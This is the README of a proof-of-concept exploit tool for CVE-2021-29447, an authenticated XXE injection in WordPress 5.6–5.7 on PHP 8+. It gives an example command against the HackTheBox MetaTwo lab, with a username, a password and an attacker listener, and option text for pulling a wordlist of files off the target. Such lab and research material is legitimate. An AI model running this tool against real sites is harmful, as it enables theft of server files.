# CVE-2021-29447

POC to exploit WordPress 5.6-5.7 (PHP 8+) Authenticated XXE Injection. More about this CVE [here](

## Example

Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress website with Media Library vulnerable to XXE Injection.

python -u manager -p partylikearockstar -t metapress.htb -lh 10.10.XX.XX -lp 8081 -w file_wordlist


## Usage

usage: [-h] -u USERNAME -p PASSWORD -t TARGET -lh LHOST [-lp LPORT] [-w WORDLIST] [-i] [-v] [-s]
              [filenames ...]

positional arguments:
  filenames             Filenames to fetch

  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Username to user in authenticated upload
  -p PASSWORD, --password PASSWORD
                        Password to user in authenticated upload
  -t TARGET, --target TARGET
                        Remote host to target, e.g. "metapress.htb"
  -lh LHOST, --host LHOST
                        Hostname on which server is bound (default "")
  -lp LPORT, --port LPORT
                        Listening port (default "8080")
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist of filenames to be fetched
  -i, --interactive     Runs in interactive mode
  -v, --verbose         Enables verbose mode
  -s, --skip            Skip php server spin-up (MAKE SURE IT IS ALREADY RUNNING!)

## Installation

**Make sure you have php installed.**

git clone
cd CVE-2021-29447
pip install -r requirements.txt